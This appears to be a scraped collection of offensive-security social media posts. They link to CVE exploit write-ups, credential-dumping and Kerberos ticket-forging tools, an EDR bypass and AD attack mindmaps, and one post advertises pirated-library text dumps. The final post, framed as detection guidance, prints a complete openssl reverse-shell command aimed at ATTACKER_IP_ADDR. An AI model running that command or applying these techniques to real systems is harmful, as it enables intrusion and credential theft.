If you're interested by an alternative way to dump domain users' NT hashes and TGT without touching LSASS, take a look at the new Masky tool :) Everything is explained in this article: z4ksec.github.io/posts/masky-re… Thanks Will Schroeder, Lee Chagolla-Christensen and Oliver Lyak for their amazing work on ADCS!

So this is the blogpost about CVE-2022-22715 Windows Dirty Pipe, I share the root cause and exploitation on it, thanks all help from our KunlunLab and Adobe Product Security Incident Response Team. Enjoy! Blog post: whereisk0shl.top/post/break-me-… PoC: github.com/k0keoyo/my_vul…

Our intern qwerty was destined to analyze a recent Linux kernel LPE vuln (CVE-2022-32250), a bug found and reported by fidgeting bits. Here's a brief write-up on the analysis of the bug and the exploit development. Check it out! blog.theori.io/research/CVE-2… (exploit included)

Pack arbitrary shellcode into an executable that always has the same MD5 hash: github.com/DavidBuchanan3…

🧵 (1/) Forged Tickets Thread Golden 🔑 tickets are no longer in fashion, so here’s a short memo on using Diamond 💎 (Charlie Clark) and Sapphire (Charlie Bromberg « Shutdown ») tickets with ticketer[.]py from #Impacket. At first let’s recap what we already know about Golden tickets ⤵️ #ad #kerberos

PoC for CVE-2022-3368 , arbitrary file move bug I found in Avira Security. github.com/Wh04m1001/CVE-…

The last part of A New Attack Surface on MS Exchange - #ProxyRelay is out! Have also left some final thoughts on the Closing part. Hope you all enjoy this journey :D blog.orange.tw/2022/10/proxyr…

SharedMemUtils - A simple tool to automatically find vulnerabilities in shared memory objects (commonly used for IPC in Windows services) This tool immediately uncovered potential exploitation routes in both Nvidia and Dell Audio services on my system. x86matthew.com/view_post?id=s…

Dumping LSASS is such a 2020 move, let me introduce a new CrackMapExec module called Masky developed by Zak 🎉 If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT 🚀 Crazy module 🪂

remote controlling windows services (useful for rce/lateral movement) is possible not only by interacting with SMB (445) but by calling MSRPC (135+49679) also. added (fixed?) the MSRPC version in the services[.]py example for impacket, here it is: github.com/tothi/impacket…

Welcome to the new AD Mindmap upgrade ! v2022_11 will be dark only (this is too painful to maintain two versions). Thx again to : Viking and Hocine for their help 👍 Full quality and zoomable version here : orange-cyberdefense.github.io/ocd-mindmaps/i… Overview :

Updated the DACL abuse mindmap. New dark theme, used BloodHound's iconography, added the ACE inheritance path for Containers and Organizational Unit. 🧑‍🍳 The Hacker Recipes thehacker.recipes/ad/movement/da…

We are still looking to hire an extremely motivated reverse engineer to replace me as the main content creator of GH. You must be able to generate significant traffic and content at scale, ideally you would already have a YT channel which gets 10k+ view per video. GH has

all you need to know about offensive #SCCM condensed into an awesome presentation including hands-on demos by X-Technobro from Black Hills Information Security: youtube.com/watch?v=W9PC9e…

Refreshed "pass the things" AD mindmap, the previous one was not in a dark theme (outrageous I know) ⏩ thehacker.recipes/ad/movement/nt… 💡 made with draw.io

Bypassing Crowdstrike Falcon EDR hooks with targeted algo, decomposing agent's hooking logic. Although extremely Falcon-specific, nevertheless good exercise for any maldev. Great work, inbits! #redteam inbits-sec.com/posts/in-memor…

In our latest #blog, Principal Security Consultant Adam Chester 🏴‍☠️ discusses some of the post-exploitation techniques he finds useful in cloud environments, specifically #Okta. Read it now! hubs.la/Q022wWkX0

542.8 TB of high quality text: LibGen RS - 72.8 TB - 6,738,687 txt files Link: annas-archive.org/datasets/libge… Sci-Hub - 87.2 TB - 97,847,479 txt files Link: annas-archive.org/datasets/scihub LibGen IL - 208.1 TB - 16,291,414 txt files Link: annas-archive.org/datasets/libge… Z-Library - 98.8 TB -

Those bad boys got new guns: - ADCS ESC12 & 13 and ESC8 from WSUS poisoning - SCCM takeover from passive server - AD Miner and SOAPHound - LDAP pass back - PXE boot attacks - Creds from third-party softs ... hideandsec.sh/books/cheatshe… hideandsec.sh/books/cheatshe… hideandsec.sh/books/cheatshe…

We're going to show you how to detect someone using the openssl binary on Linux as an encrypted backdoor for a living off the land technique: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP_ADDR:443 > /tmp/s; rm /tmp/s